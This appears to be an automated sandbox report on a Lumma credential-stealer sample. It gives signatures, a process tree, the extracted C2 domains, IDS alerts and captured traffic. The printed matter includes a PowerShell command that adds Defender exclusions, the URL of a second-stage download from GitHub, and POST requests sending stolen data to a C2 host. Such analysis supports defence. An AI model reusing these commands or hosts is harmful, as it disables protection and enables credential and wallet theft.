Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1544948
MD5:	3ba35e9d091539ec658813e3d15e4b89
SHA1:	3baf91a24418399f05d99206f8f004ae48d6a134
SHA256:	aa133af788a57f91449a01402067a28f744172154f3a5d3f8d0d47f350037ec8
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has nameless sections

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Powershell Defender Exclusion

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3BA35E9D091539EC658813E3D15E4B89)

conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7424 cmdline: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

WmiPrvSE.exe (PID: 7636 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

pdf.exe (PID: 7980 cmdline: "C:\Lipras\pdf.exe" MD5: 21EB0B29554B832D677CEA9E8A59B999)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["opposezmny.site", "faulteyotk.site", "contemteny.site", "ponintnykqwm.shop", "authorisev.site", "servicedny.site", "seallysl.site", "goalyfeastz.site", "dilemmadu.site"], "Build id": "g392sM--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: pdf.exe PID: 7980	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7300, ParentProcessName: file.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 7424, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7300, ParentProcessName: file.exe, ProcessCommandLine: "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 7424, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T22:04:23.500292+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	172.67.180.76	443	TCP
2024-10-29T22:04:24.909395+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49739	172.67.180.76	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T22:04:23.500292+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49738	172.67.180.76	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T22:04:24.909395+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49739	172.67.180.76	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T22:04:22.986375+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	172.67.180.76	443	TCP
2024-10-29T22:04:24.179898+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	172.67.180.76	443	TCP
2024-10-29T22:04:25.771066+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.4	49740	172.67.180.76	443	TCP
2024-10-29T22:04:32.201272+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	172.67.180.76	443	TCP
2024-10-29T22:04:33.597292+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	172.67.180.76	443	TCP
2024-10-29T22:04:38.293697+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.4	49743	172.67.180.76	443	TCP
2024-10-29T22:04:43.432466+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.4	49744	172.67.180.76	443	TCP
2024-10-29T22:04:50.251549+0100	2057094	1	Domain Observed Used for C2 Detected	192.168.2.4	49745	172.67.180.76	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T22:04:22.292432+0100	2057093	1	Domain Observed Used for C2 Detected	192.168.2.4	49856	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T22:04:31.448651+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49740	172.67.180.76	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Lipras\pdf.exe

Avira: detection malicious, Label: HEUR/AGEN.1314134

Found malware configuration

Source: pdf.exe.7980.7.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["opposezmny.site", "faulteyotk.site", "contemteny.site", "ponintnykqwm.shop", "authorisev.site", "servicedny.site", "seallysl.site", "goalyfeastz.site", "dilemmadu.site"], "Build id": "g392sM--"}

Multi AV Scanner detection for dropped file

Source: C:\Lipras\pdf.exe

ReversingLabs: Detection: 59%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Lipras\pdf.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: servicedny.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: authorisev.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: faulteyotk.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: dilemmadu.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: contemteny.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: goalyfeastz.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: opposezmny.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: seallysl.site
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: ponintnykqwm.shop
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: - Screen Resoluton:
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: Workgroup: -
Source: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp	String decryptor: g392sM--

Source: C:\Lipras\pdf.exe

Code function: 7_2_0004D5AF CryptUnprotectData,

7_2_0004D5AF

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdb source: file.exe
Source:	Binary string: C:\Users\danie\source\repos\Session\Session\obj\Debug\Session.pdbnh source: file.exe

Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]	7_2_00040130
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov byte ptr [ebx], dl	7_2_00040130
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]	7_2_00040130
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov edx, ecx	7_2_00040130
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov edx, ecx	7_2_00040130
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	7_2_000741F0
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov byte ptr [ebx], cl	7_2_0005EB60
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov ecx, eax	7_2_0005EB60
Source: C:\Lipras\pdf.exe	Code function: 4x nop then lea edx, dword ptr [eax-80h]	7_2_0005EB60
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+0000009Ch]	7_2_0005EB60
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+068F7B6Bh]	7_2_0005EB60
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	7_2_0005EB60
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov byte ptr [ebx], al	7_2_0005EB60
Source: C:\Lipras\pdf.exe	Code function: 4x nop then jmp eax	7_2_0004D5AF
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+ebx]	7_2_00035820
Source: C:\Lipras\pdf.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	7_2_0005E870
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_0004C8CE
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov ecx, eax	7_2_0003E8DE
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+5A603547h]	7_2_0004011A
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov byte ptr [ebx], dl	7_2_0004011A
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx ecx, byte ptr [ecx+eax-24F86745h]	7_2_0004011A
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov edx, ecx	7_2_0004011A
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov edx, ecx	7_2_0004011A
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+esi]	7_2_0003C960
Source: C:\Lipras\pdf.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	7_2_0006B170
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov ecx, eax	7_2_0003E996
Source: C:\Lipras\pdf.exe	Code function: 4x nop then jmp eax	7_2_0005AA40
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1817620Ch]	7_2_0005AA60
Source: C:\Lipras\pdf.exe	Code function: 4x nop then jmp edx	7_2_000732C0
Source: C:\Lipras\pdf.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	7_2_000732C0
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2BB126CDh]	7_2_0006FAD0
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov edi, edx	7_2_00051B40
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	7_2_00074380
Source: C:\Lipras\pdf.exe	Code function: 4x nop then jmp edx	7_2_000733B0
Source: C:\Lipras\pdf.exe	Code function: 4x nop then xor byte ptr [ecx+ebx], bl	7_2_000733B0
Source: C:\Lipras\pdf.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	7_2_0005E400
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov edi, esi	7_2_0004ECDE
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov ebx, eax	7_2_0003D500
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_0005DE70
Source: C:\Lipras\pdf.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_0004C6E0
Source: C:\Lipras\pdf.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ebx-09A22FB6h]	7_2_0006F7E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49740 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49742 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49743 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49739 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49738 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49741 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49745 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2057093 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site) : 192.168.2.4:49856 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057094 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI) : 192.168.2.4:49744 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.180.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 172.67.180.76:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: opposezmny.site
Source: Malware configuration extractor	URLs: faulteyotk.site
Source: Malware configuration extractor	URLs: contemteny.site
Source: Malware configuration extractor	URLs: ponintnykqwm.shop
Source: Malware configuration extractor	URLs: authorisev.site
Source: Malware configuration extractor	URLs: servicedny.site
Source: Malware configuration extractor	URLs: seallysl.site
Source: Malware configuration extractor	URLs: goalyfeastz.site
Source: Malware configuration extractor	URLs: dilemmadu.site

Source: global traffic	HTTP traffic detected: GET /vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vonuch1/start/refs/heads/main/khtoawdltrha.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View	IP Address: 140.82.121.4 140.82.121.4

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1247Host: seallysl.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570144Host: seallysl.site

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vonuch1/start/refs/heads/main/khtoawdltrha.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: ponintnykqwm.shop
Source: global traffic	DNS traffic detected: DNS query: seallysl.site

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: seallysl.site

Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000004.00000002.1737431201.0000000007E93000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000002.4141670945.0000000002386000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: file.exe, 00000000.00000002.4141670945.0000000002386000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.comd
Source: powershell.exe, 00000002.00000002.1759697438.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: file.exe, 00000000.00000002.4141670945.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: file.exe, 00000000.00000002.4141670945.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.comd
Source: powershell.exe, 00000002.00000002.1752259690.0000000005025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.4141670945.0000000002301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1752259690.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.00000000048E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1752259690.0000000005025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
